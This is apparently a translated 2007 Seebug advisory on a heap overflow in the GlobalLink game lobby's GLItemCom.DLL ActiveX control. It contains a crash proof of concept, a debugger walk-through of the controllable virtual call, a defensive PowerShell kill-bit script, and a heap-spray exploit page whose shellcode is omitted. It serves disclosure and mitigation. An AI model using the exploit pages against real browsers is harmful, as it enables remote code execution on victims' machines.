GlobalLink (联众世界) Game Lobby GLItemCom.DLL ActiveX Control Heap Overflow Vulnerability

2007-09-11T00:00:00
ID SSV:2200
Type seebug
Reporter Root
Modified 2007-09-11T00:00:00

Description

BUGTRAQ ID: 25565

The GlobalLink (联众世界) game lobby is a game client developed in-house by 联众世界 that bundles board, card, casual and head-to-head games.

The SetClientInfo() function of the GLItemCom.DLL ActiveX control installed by the game lobby contains a heap overflow vulnerability.

If a user is tricked into visiting a malicious web page with IE, the overflow can be triggered, leading to execution of arbitrary code on the user's system. The published PoC code follows:

-----[Cut Below]------------------------------------------------------------------
<OBJECT id=target classid=clsid:7D1425D4-E2FC-4A52-BDA9-B9DCAC5EF574></OBJECT>
<SCRIPT>
s="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
target.SetClientInfo(1, s, 1)
</SCRIPT>
-----[Cut Above]-------------------------------------------------------------------

After running the PoC, OllyDbg catches an access violation reading the invalid address [41414145]. The vulnerable code is:

033D9315 |> \8B86 DC000000   MOV EAX,DWORD PTR DS:[ESI+DC]
033D931B |. 85C0             TEST EAX,EAX
033D931D |. 74 34            JE SHORT 033D9353
033D931F |. FF70 04          PUSH DWORD PTR DS:[EAX+4]                ; /hWnd  <=== faulting instruction
033D9322 |. FF15 F8523F03    CALL DWORD PTR DS:[<&USER32.IsWindow>]   ; \IsWindow

Register state at this point:

EAX 41414141
ECX 03442070
EDX 006900CD ASCII "ox"
EBX 03442070
ESP 02B9FB2C
EBP 02B9FB48
ESI 03441FD0
EDI 0344210C
EIP 033D931F glitemfl.033D931F

EAX is "AAAA", so the value of EAX is under our control, but at this point the instruction flow cannot yet be redirected. Next:

033D9328 |. 85C0             TEST EAX,EAX
033D932A |. 74 0F            JE SHORT 033D933B                        ; eax is 0, jump to 0x033D933B
033D932C |. 8B86 DC000000    MOV EAX,DWORD PTR DS:[ESI+DC]
033D9332 |. FF70 04          PUSH DWORD PTR DS:[EAX+4]                ; /hWnd
033D9335 |. FF15 44533F03    CALL DWORD PTR DS:[<&USER32.DestroyWindo> ; \DestroyWindow
033D933B |> 8B8E DC000000    MOV ECX,DWORD PTR DS:[ESI+DC]            ; ecx is the eax value we controlled above
033D9341 |. 85C9             TEST ECX,ECX
033D9343 |. 74 07            JE SHORT 033D934C                        ; if ECX is non-zero, no jump
033D9345 |. 8B01             MOV EAX,DWORD PTR DS:[ECX]
033D9347 |. 6A 01            PUSH 1
033D9349 |. FF50 0C          CALL DWORD PTR DS:[EAX+C]                ; virtual function call, potentially controllable
033D934C |> 83A6 DC000000>   AND DWORD PTR DS:[ESI+DC],0
033D9353 |> 8D86 40010000    LEA EAX,DWORD PTR DS:[ESI+140]

From the code flow above, [ESI+DC] is an object pointer that is released here, and it is user-controllable. The object's layout is roughly:

+00h  vmt_ptr
+04h  hWnd
+08h  ...

For exploitation to succeed, the address holding hWnd must be readable and the hWnd read from it must be an invalid window handle; control then reaches 0x033D933B, and the address at offset 0x0C from where vmt_ptr points must point to the shellcode. These conditions are easy to satisfy in IE.

Affected: GlobalLink GlobalLink 2.7.0.8. The vendor has not yet released a patch or upgrade; we recommend that users of this software watch the vendor's home page for the latest version:

http://www.ourgame.com/
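Since no vendor fix is available, the standard interim mitigation is to set the Internet Explorer kill bit for the control's CLSID so IE refuses to instantiate it. The script below is an added example, not part of the advisory and not from the vendor; it assumes an elevated PowerShell session on Windows and uses the CLSID from the PoC above.

```powershell
# Added example (not from the advisory or the vendor): set the IE kill bit for the
# vulnerable GLItemCom.DLL control. Assumes an elevated PowerShell session.
$Clsid   = '{7D1425D4-E2FC-4A52-BDA9-B9DCAC5EF574}'   # CLSID from the PoC above
$KillBit = 0x400   # COMPAT_EVIL_DONT_LOAD bit of the "Compatibility Flags" value

# Native location plus the Wow6432Node view read by 32-bit IE on 64-bit Windows.
# On 32-bit Windows the second key is simply created unused; it is harmless.
$Paths = @(
    "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid",
    "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
)

function Set-ActiveXKillBit {
    param([string[]]$RegPaths, [int]$Flag)
    foreach ($p in $RegPaths) {
        # Create the key if missing, keep any flags already present and OR in the kill bit.
        $null = New-Item -Path $p -Force
        $current = (Get-ItemProperty -Path $p -Name 'Compatibility Flags' `
                    -ErrorAction SilentlyContinue).'Compatibility Flags'
        if ($null -eq $current) { $current = 0 }
        Set-ItemProperty -Path $p -Name 'Compatibility Flags' `
                         -Value ($current -bor $Flag) -Type DWord
    }
}

function Test-ActiveXKillBit {
    param([string[]]$RegPaths, [int]$Flag)
    # Returns $true only when every location carries the kill bit.
    foreach ($p in $RegPaths) {
        $v = (Get-ItemProperty -Path $p -Name 'Compatibility Flags' `
              -ErrorAction SilentlyContinue).'Compatibility Flags'
        if ($null -eq $v -or (($v -band $Flag) -ne $Flag)) { return $false }
    }
    return $true
}

Set-ActiveXKillBit -RegPaths $Paths -Flag $KillBit
if (Test-ActiveXKillBit -RegPaths $Paths -Flag $KillBit) {
    "Kill bit set for $Clsid"
} else {
    "Kill bit NOT set for $Clsid; check permissions and re-run elevated"
}
```

Restart Internet Explorer after running it; the PoC page above should then fail to create the object instead of crashing the browser.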

A full exploit that combines the same SetClientInfo() call with a heap spray has also been published:

-----[Cut Below]------------------------------------------------------------------
<OBJECT id=target classid=clsid:7D1425D4-E2FC-4A52-BDA9-B9DCAC5EF574></OBJECT>
<SCRIPT>
document.write("<meta http-equiv=\"refresh\" content=\"1, " + window.location.href + "\"></meta>");
var heapSprayToAddress = 0x0c0c0c0c;
var shellcode = unescape(
// just pop up a MessageBox
// (shellcode bytes omitted from this record)
);

var heapBlockSize = 0x100000;
var payLoadSize = shellcode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u0c0c%u0c0c");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x100000)/heapBlockSize;
memory = new Array();

for (i=0;i<heapBlocks;i++)
{
     memory[i] = spraySlide + shellcode;
}

function getSpraySlide(spraySlide, spraySlideSize)
{
   while (spraySlide.length*2<spraySlideSize)
   {
     spraySlide += spraySlide;
   }
   spraySlide = spraySlide.substring(0,spraySlideSize/2);
   return spraySlide;
}

s="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+"\x0c\x0c\x0c\x0c"
target.SetClientInfo(1, s, 1)
</SCRIPT>
-----[Cut Above]-------------------------------------------------------------------